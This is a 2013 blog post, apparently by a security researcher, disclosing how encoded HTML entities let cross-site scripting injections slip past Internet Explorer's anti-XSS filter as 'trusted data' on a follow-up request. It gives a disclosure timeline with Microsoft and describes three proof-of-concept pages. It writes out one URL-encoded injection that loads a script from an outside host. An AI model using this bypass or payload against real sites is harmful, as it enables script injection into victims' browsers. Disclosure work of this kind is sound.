R. T. Waysea's Blog

Of Trusted And Untrusted Data
Another methodology for bypassing the Cross Site Scripting filter in all versions
of Microsoft's Internet Explorer web browser.

Date Event
August 23, 2013 Initial discovery of a method to bypass the Cross Site Scripting filter in all versions of Internet Explorer.
August 24, 2013 - August 25, 2013 Development of a generic Proof-of-Concept for testing and submission to Microsoft.
August 26, 2013 Submission of the generic Proof-of-Concept with working deliberately vulnerable code examples to Microsoft.
August 27, 2013 Microsoft confirms reception of materials, and opens case 15412.
September 3, 2013 - October 3, 2013 Several emails are sent back and forth about this issue.
October 4, 2013 Microsoft makes its final decision that this method of bypassing the Cross Site Scripting filter on all versions of its Internet Explorer will not be fixed.
October 4, 2013 The author (me) receives the above decision and subsequently notifies Microsoft that the method will be disclosed in two weeks time.
October 4, 2013 Microsoft acknowledges and accepts that the disclosure will occur.
October 18, 2013 Disclosure occurs.


Author's Note
UPDATED: 2013-10-24

This is the "short" write-up. The longer version has more information, should you wish to read it.

Before going any further, this is not an "end-of-the-world" issue with Microsoft's Internet Explorer family of browsers. This is a relatively simple method to bypass the reflective anti-Cross Site Scripting filter, and developers and site owners can protect their users by remediating the Cross Site Scripting vulnerabilities that are found in their work. As one resource that is available, OWASP has released a handy "Cheat Sheet" for preventing and fixing Cross Site Scripting vulnerabilities (a DOM-based Cross Site Scripting prevention "Cheat Sheet" is also available).

There is an addendum to this post with an additional finding. Please continue reading this write-up, and then proceed to the addendum.



This is a rather long post, even after I edited it down from the original longer post that contains more information. Some of you may want to read through it in its entirety, others may just want the code to play with. Still others may just skim bits and try to pick out the important parts.

For those of you that just want the deliberately vulnerable code to play with, you can obtain the HTML pages and PHP code here. There is a main index.html file there that contains working injections and a short description on how to execute the injected JavaScript code (all injections work as of February 05, 2014). If at all possible, even if you fall into this group, I still encourage you to read the section titled "The Idea" for thoughts on where to go in your own research.

For those of you that plan on skimming this article, the section titled "The Story" can be mostly skipped and you won't lose much of anything. The one possible exception is the three paragraphs and the two following examples beginning with "Hexadecimal references...". If you have time, read that and then go ahead and jump to "The Idea" and continue from there. Most people that have at least a beginner's understanding of HTML and PHP can also skip over the section titled "The Code" if desired, as the methodology should be made fairly obvious by experimenting with the provided examples. Feel free, however, to circle back to that section (or any other section) for any initial questions.

Microsoft requested that I include a blurb about their reasoning as to why they decided to not fix this bypass, and per their wishes I have included it below. Please consider reading it, as well as my response to it toward the bottom of this page.


The Story

On August 23, 2013, I was performing a manual evaluation of a website for web security vulnerabilities and issues. The work was almost completed, and it was already past the time most people had left the office. I was performing my usual due diligence, and browsing the website in the various web browsers that I have at my disposal to see if any browser-specific functionality would be found.

Earlier in the day I had found a mildly interesting Cross Site Scripting ("XSS") vulnerability on the site. An injection would land in the attribute space of an iframe definition, and the page that was specified in the definition was vulnerable to a reflected XSS injection. So a victim would be induced to clicking on a link (or submitting a form), the injection would land in the primary page (where it would not execute), and that primary page would make a call to the vulnerable secondary page. As the vulnerable page rendered in the victim's web browser, the script would then execute.

Again, it was a mildly interesting occurrence, but nothing to get overly excited about.

I do admit that at the time I was playing with the functionality a bit and seeing how clever I could be with various encodings that would look strange, and possibly pass the 'does it look like an obvious injection?' test, but still be rendered in the browser as I (the "attacker") would want it to be rendered.

Author's note: For some time now it has been known that Internet Explorer does not subject HTTP header data to the anti-XSS filter, and injections from cookie values or the 'Referer' value would pass through without validation. I was not testing XSS injections on these places as they were not being reflected in responses.

Back to the story in a bit, but first, some background: 

Hexadecimal references to characters appear to be first included in the HTML standard in the HTML 4.0 specification from April of 1998, in section 3.2.3: Character references. The previous standard recommendation, HTML 3.2, has a list of allowed decimal encoded entities ("Character Entities for ISO Latin-1"), but not hexadecimal entities. Subsequent HTML standards version 4.01 and the still-in-the-works version 5 both continue the support for hexadecimal entities in section 5.3.1 of HTML 4.0.1 and section 8.1.4 of the current revision of HTML 5.

Decimal encoded entities have a slightly longer history. The first mention of decimal entities in the official HTML standards goes all the way back to the first official HTML standard in HTML 2.0 under "ISO Latin 1 Character Entity Set" in 1995. As with hexadecimal entities, the latest revisions continue to support such references under the same sections noted above, 5.3.1 of HTML 4.0.1, and 8.1.4 of the current revision of HTML 5.

When post-1998 web browsers see correctly encoded hexadecimal references to characters, and post-1995 web browsers see correctly encoded decimal references to characters, those encodings can then be automatically decoded and properly rendered based on where in the resulting document the hexadecimal entity is located. The method of encoding characters as hexadecimal references may be referred to as "HTML Entity Encoding", but I'll be using the word 'hexadecimal' throughout this post.

As an example, this sentence is composed entirely of hexadecimal entity characters. This sentence, however, consists of decimal entity characters.

And as another example, the text inside is also hexadecimal encoded, while the url in this link is decimal encoded (go ahead, check the HTML source of this page).

This ability to use hexadecimal encoding for injection testing is fairly well known, so I was not expecting anything to occur when I began mixing encodings into the injections I was using in Internet Explorer 10. The anti-XSS filter in Internet Explorer does a reasonably good job of filtering out obvious injections, and I wasn't expecting anything to happen.

And then I saw the JavaScript alert(1) pop-up appear.

Naturally, my first thought was that I had some non-obvious setting disabled, so I went back and made sure everything was set to the defaults and submitted the injection again, and got the same alert(1) pop-up. At this point, to be sure that I wasn't overlooking something and making a stupid mistake, I restarted my testing virtual machine, then I restarted my computer. And the same JavaScript alert(1) pop-up appeared again and again.

So, what was happening?

I was using an injection containing hexadecimal encoded characters that was reflected back in the resulting HTML source. Then a secondary request was made to the same domain in which the hexadecimal encoded characters were automatically decoded and sent with the request. The anti-XSS filter in Internet Explorer saw the first request, didn't parse the injection as being "harmful," and subsequently didn't bother to check the resulting secondary request made with the now decoded and obviously "harmful" injection. Injections like <script src=something ></script> should always be caught by an anti-XSS filter.

I spent the weekend building some deliberately vulnerable code that demonstrated this bypass, testing it against all versions of Internet Explorer that have the anti-XSS filter (version 8 and up), downloading the test release of Internet Explorer 11 (the "Developer Preview" edition) and testing the bypass against that, and figuring out how to properly disclose this to Microsoft.

I submitted a description of what was happening and the deliberately vulnerable Proof-of-Concept code to Microsoft, and Microsoft opened case 15412 to track this issue. A little over a month later, after several emails going back and forth between us, Microsoft informed me that they will not be releasing a fix for this bypass of their anti-XSS filter. I informed them that I would be disclosing this method in two weeks time (October 18, 2013). Microsoft acknowledged and accepted this, and so, as scheduled, I have released this write-up along with deliberately vulnerable code to test and explore with.


The Idea

So, again we have the question of what is happening?

The title of this blog post, Of Trusted And Untrusted Data, alludes to what I believe is happening with Internet Explorer's anti-XSS filter, why the method of injecting currently works, and avenues for web security researchers to investigate in finding other ways to bypass the anti-XSS filter.

From testing, it appears that the anti-XSS filter in Internet Explorer divides received data into two different categories:

The "Untrusted Data" consists of items that appear in the initial request, from URL and POST body parameters and values to the URL itself at times.

The "Trusted Data" consists of almost everything else that appears in the HTTP response body.

What appears to be happening with these injections is that the injections start off as "Untrusted Data" and are screened by the anti-XSS filter. When Internet Explorer's anti-XSS filter fails to see the injections as potentially harmful, they are then included in the response body without any attempt to further output-encode them. At this point the "Untrusted Data" then becomes "Trusted Data" and is not subject to further screening. When subsequent requests are made using this now "Trusted Data", Internet Explorer makes the decision to not subject the injected data to the anti-XSS filter.

What this means, for web security researchers, is that if the injection looks benign in the initial request, it can be as malicious as desired in any subsequent requests, and it will not be filtered out.


The Code

First, go grab the code. It can be run on any web server that can parse PHP files.

I've included three deliberately vulnerable PHP-based Proof-of-Concepts in the provided code, and I'll briefly go over them here.

The first Proof-of-Concept is a slightly modified version of the example I submitted to Microsoft. I believe it demonstrates just what is happening the most clearly, as everything is broken up into the component parts.

In the first Proof-of-Concept, the injection lands in the attribute space of an form input tag. The form is then submitted to a vulnerable page where the value of the 'xss' parameter is reflected directly. The example I submitted to Microsoft had the form being automatically submitted, but otherwise the code is almost identical.

When observing the input field from the browser window, it will be very obvious that the injection is one that should be caught. Viewing the source of the page, however, reveals that a few of the letters that make up the injection have been replaced with their hexadecimal or decimal-encoded equivalent. The browser sees these encoded characters and properly decodes them per the official HTML standard. The anti-XSS filter does not decode the injection, and subsequently does not see the injection as potentially harmful. When the user then submits the form to the vulnerable page, the browser automatically decodes the hexadecimal or decimal encoded characters and submits the parameter value as 'regular' text (with special characters URL-encoded).

This second request comes from data that passed the initial screening of the anti-XSS filter and is "Trusted Data" that is not subject to additional screening. And so even though the injection appears in the request as the obviously potentially malicious %3Cscript+src%3D%2F%2Fxy.hn%2Fa.js+%3E%3C%2Fscript%3E, the anti-XSS filter in Internet Explorer completely ignores it.

The second Proof-of-Concept is based on my initial finding where the injection lands in an iframe definition and is subsequently reflected in the page specified in the iframe definition. This example is slightly less clear than the first, as the injection is not broken out into its own <input... field. The injection is still landing in attribute space, and is still not being filtered as potentially malicious by the anti-XSS filter. Once it lands, it is then treated as "Trusted Data" and thus when the iframe makes the call for the vulnerable page, the injection is again ignored.

Unlike the first Proof-of-Concept, no user interaction is required for the injected JavaScript to execute. The first Proof-of-Concept requires that the user submit the form, and was designed to give the user more control over that occurrence. When the iframe definition is rendered in the user's browser, the secondary request is automatically made to the vulnerable page without the user needing to tell the browser to make that request.

The third Proof-of-Concept does not use any form or frame/iframe functionality. Rather it is a single page where an injection is directly reflected in the visible text space of the page. As a minor challenge, I included a message informing the user to be wary of the type of injection that will be used.

For this Proof-of-Concept, the injection is a <div> tag with an ordinary <a href="..."> tag containing a link back to the same page, but this time with the XSS injection fully decoded. As with the previous two Proof-of-Concepts, the injection lands in attribute space, is properly decoded by the browser, but is not decoded by the anti-XSS filter. The injection is subsequently declared to be "Trusted Data" and is then ignored by the anti-XSS filter on future requests. The only difference is that the initial injection creates its own attribute space to 'hide' the XSS injection, whereas the previous two Proof-of-Concepts utilized attribute spaces that were already provided.


The Decision from Microsoft

When I informed Microsoft that I was going to disclose this methodology for bypassing the anti-XSS filter in all versions of Internet Explorer, Microsoft acknowledged and accepted that it would occur. Microsoft did request that I include a link to their design philosophy blog post in this write up, which can be found at:


Specifically, Microsoft referenced category 3 on the above page in which it discusses "application-specific transformations," and in particular the possibility of an application that would "ROT13 decode" values before reflecting them.

The "ROT13 decode" and "application-specific transformations" mentions do not apply. As noted above, hexadecimal and decimal encodings have been part of the official HTML standard since 1998 and 1995, respectively. There is no "only appears in this one type of application" functionality being used. The XSS injection lands in attribute space and is then relayed to a vulnerable page (either another page, or back to itself) where it executes.

Beyond that, the ability to use hexadecimal and/or decimal encodings to bypass the anti-XSS filter in Internet Explorer is not the flaw, but rather two implementations of Proof-of-Concept exploits that make use of the flaw to achieve a bypass. The flaw, instead, is that injected "Untrusted Data" can be turned into "Trusted Data" and that injected "Trusted Data" is not subject to validation by the anti-XSS filter.

The sub-title for this post begins with "Another methodology...", as that is just what this is. The finding is not one or two specific encodings that can be used, but a method that security researchers can add to their toolkit and use as part of their professional work:

That is the flaw. Rather than processing and filtering all requests from the user, only a subset of requests is validated. And for those requests, the anti-XSS filter only looks for immediate code execution. The ability to use standard HTML encodings is just an implementation utilizing that flaw.


The End?

Well, that's where things are as of Friday, October 18, 2013.

The code is available for you to test out on your own, and The Idea should give you a place to start your own research into other potential methods.

At this time there's not much more for me to say.

Thank you for reading.

  R. T. Waysea

        By Way of the Sea

Have a comment on this? Think I got something wrong? Let me know.

© 2015 - R.T.Waysea Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 United States License.

All trademarks are property of their respective owners.

If you are foolish enough to believe that anything here represents the thoughts/views/opinions/etc. of any employer of mine (past, present, or future), please don't embarrass yourself by advertising that fact.

Valid XHTML 1.0 Strict